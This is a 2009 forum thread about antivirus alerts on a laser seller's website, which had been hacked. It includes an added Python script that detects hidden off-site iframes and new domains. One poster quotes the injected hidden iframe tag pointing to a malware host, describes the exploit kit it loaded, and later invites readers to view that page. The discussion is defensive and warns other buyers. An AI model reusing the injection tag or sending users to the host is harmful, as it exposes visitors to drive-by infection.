Welcome to Laser Pointer Forums - discuss green laser pointers, blue laser pointers, and all types of lasers

O-Like Virus?

Joined
Nov 27, 2008
Messages
863
Points
18
Hmmm... Anyone else getting virus alerts on the O-Like site this morning? I want to order a few Dildas, but my AV program keeps panicking and not letting me access the site.

Doesn't happen with the laptop, though... Weird. Anyone else having the trouble?
 





Joined
Nov 22, 2008
Messages
1,506
Points
48
<iframe src=http://www.2009tttt.cn/jzll/2.htm width=50 height=0 border=0></iframe>

I don't know what this bit is about; a domain lookup reports:


Whois Record

Domain Name: 2009tttt.cn
ROID: 20090202s10001s11551185-cn
Domain Status: ok
Registrant Organization: 王晓峰 (Wang Xiaofeng)
Registrant Name: 王晓峰 (Wang Xiaofeng)
Administrative Email:
Sponsoring Registrar: 北京万网志成科技有限公司 (Beijing Wanwang Zhicheng Technology Co., Ltd.)
Name Server: ns.cdnhost.cn
Name Server: ns.dnsfamily.com
Registration Date: 2009-02-02 21:42
Expiration Date: 2010-02-02 21:42

It was only registered 2 days ago?

That page contains ANOTHER iframe to some code I can't post, and a javascript page (page not found, on a Yahoo host), but it looks VERY MUCH LIKE A VIRUS! BE CAREFUL! This has happened before where a page is hijacked on a vulnerable server to spread their virus and blame a reputable seller. I'm going to PM the owner - it's someone with a name like standstone11?
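A check for the two signals in the post above (a near-invisible iframe pointing off-site, and a target domain registered only days earlier), as an added example that is not part of the original thread. The surrounding shop HTML, the shop hostname `example-shop.test`, the date of the check and the trimmed whois text are constructed for the demonstration; only the quoted iframe tag and the 2009tttt.cn registration date come from the post.

```python
"""Flag hidden or off-site iframes in fetched HTML and compute how old the
domain an iframe points at is, from a whois record. Added example; all
sample input below is constructed except the iframe tag and whois dates
quoted in the thread."""
import re
from datetime import datetime
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: the injected tag from the thread, embedded in an
# otherwise ordinary (made-up) shop page with one legitimate iframe.
SAMPLE_PAGE = """<html><body>
<h1>Green laser modules</h1>
<iframe src="https://www.example-shop.test/cart" width="300" height="200"></iframe>
<iframe src=http://www.2009tttt.cn/jzll/2.htm width=50 height=0 border=0></iframe>
</body></html>"""

# Trimmed whois record; the dates are the ones quoted in the thread.
SAMPLE_WHOIS = """Domain Name: 2009tttt.cn
Registration Date: 2009-02-02 21:42
Expiration Date: 2010-02-02 21:42
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dicts of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # html.parser already lowercases tag/attr names
            self.iframes.append({k: (v or "") for k, v in attrs})


def _dim(value):
    """Parse an HTML size attribute ('0', '50', '100px'); None if absent."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def suspicious_iframes(html, site_host, max_hidden=10):
    """Return iframes that are near-zero sized and/or load from another host.

    site_host is the hostname the page legitimately belongs to; subdomains
    of it are treated as first-party.
    """
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for f in parser.iframes:
        src = f.get("src", "")
        host = urlparse(src).hostname or ""
        width, height = _dim(f.get("width", "")), _dim(f.get("height", ""))
        reasons = []
        if (width is not None and width <= max_hidden) or (
            height is not None and height <= max_hidden
        ):
            reasons.append("near-zero size")
        if host and host != site_host and not host.endswith("." + site_host):
            reasons.append("off-site src")
        if reasons:
            hits.append({"src": src, "host": host, "reasons": reasons})
    return hits


def domain_age_days(whois_text, as_of):
    """Days between the whois Registration Date and as_of ('YYYY-MM-DD').

    Returns None when the record carries no parseable registration date,
    so a missing field is never mistaken for an old domain.
    """
    m = re.search(r"Registration Date:\s*(\d{4}-\d{2}-\d{2})", whois_text)
    if not m:
        return None
    registered = datetime.strptime(m.group(1), "%Y-%m-%d")
    return (datetime.strptime(as_of, "%Y-%m-%d") - registered).days


if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_PAGE, "example-shop.test"):
        age = domain_age_days(SAMPLE_WHOIS, "2009-02-04")  # constructed check date
        print(f"{hit['src']}: {', '.join(hit['reasons'])}; domain age {age} days")
```

Either signal on its own is weak (zero-height frames and third-party widgets are both common); the combination of a hidden frame, an unrelated host and a registration a few days old is what made this injection stand out, and a domain that is not yet in any blocklist is exactly the case where the age check earns its keep.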
 
Joined
Nov 22, 2008
Messages
1,506
Points
48
I've now posted a PM to Standstone11 but if she doesn't respond I'll email the address on their homepage. Any more experienced people want to check this out? I'll do some googling and post back here.

(PS: If you're reading this, Standstone11, I've had my eye on some of your green modules, and I may well have saved you some customers ;) )
 
Joined
Feb 23, 2008
Messages
2,832
Points
48
Their site probably got hacked. The same thing happened to me on snoctony's site a while back.
 
Joined
Nov 22, 2008
Messages
1,506
Points
48
Another edit: It's definitely a virus, actually a conglomeration of several Chinese-written viruses targeting people with browser language en-US. I remember reading about this - does anyone know the best place to report this?

My analysis shows this is a pretty major attack, targeting a collection of old bugs in Windows, IE, Flash Player, NS5 and some badly-written ActiveX objects, amongst other pieces of software. This is an organised and malicious attack - my advice is to avoid the site for the time being - this poses a real risk - in IE6, or if you're running compromised software, it could run a malicious program, log keys or cause other major problems without your knowledge or consent.

To anyone who has visited, I'd recommend a scan, but it's probably too recent to be detected. If anyone wants more info, PM me; I have got the entire network (or most of it anyway) downloaded safely.
 
Joined
Jul 17, 2008
Messages
601
Points
0
I forgot what the hack is, but I do know that they get into all the files on the page and can change basically anything.

It's very dependent on the firewall of the server that the site is hosted on.
 

Danjoo
Joined
Sep 18, 2008
Messages
202
Points
0
charlie bruce said:
Another edit: It's definitely a virus, actually a conglomeration of several Chinese-written viruses targeting people with browser language en-US.

In this case it includes German browser tags. :-?

daniel
 
Joined
Dec 9, 2007
Messages
273
Points
0
I just checked the source and couldn't find any mention of 2009tttt or whatever, nor any iframes for that matter.
I didn't receive any alerts, in Opera or IE.

I think it's safe, but I would wait for Susie to confirm, as it is her website.
 
Joined
Jun 15, 2008
Messages
165
Points
0
frogger said:
I just checked the source and couldn't find any mention of 2009tttt or whatever, nor any iframes for that matter.
I didn't receive any alerts, in Opera or IE.

I think it's safe, but I would wait for Susie to confirm, as it is her website.

Dear all,

There is no problem on my website. You can open it again and again; no warning is sent. Today we received orders as normal; nothing abnormal happened.

Susie
 
Joined
May 14, 2008
Messages
468
Points
0
Hi Susie, after your message I have visited your website without any problem, so everything is ok now. :)
 
Joined
Nov 22, 2008
Messages
1,506
Points
48
Yep, it was fixed last night - if you want to see what was on there (for people interested in that kind of stuff), have a look at the page the iframe linked to, but be careful - it targets old versions of Flash Player, IE users, ActiveX controls with recently published vulnerabilities, Netscape 5 browsers, and chooses to target people with browser language en-US and NOT zh-CN. (That could be a good safety catch so the writer doesn't get bitten by his own bug, nor his friends.) It also tries to download a trojan, and has a VBS virus in there too.

I had a security expert (well, really a network admin, but same difference) look at it; I can find out in more detail from him tomorrow.

Anyone running these compromised systems who visited O-Like in the last few days should do a full virus scan. I know for a fact Kaspersky's online scanner will be able to see at least one of these viruses, and so warn you. It doesn't see the VBS part of the virus, though, so a clean Kaspersky scan doesn't necessarily indicate you're clean...
 



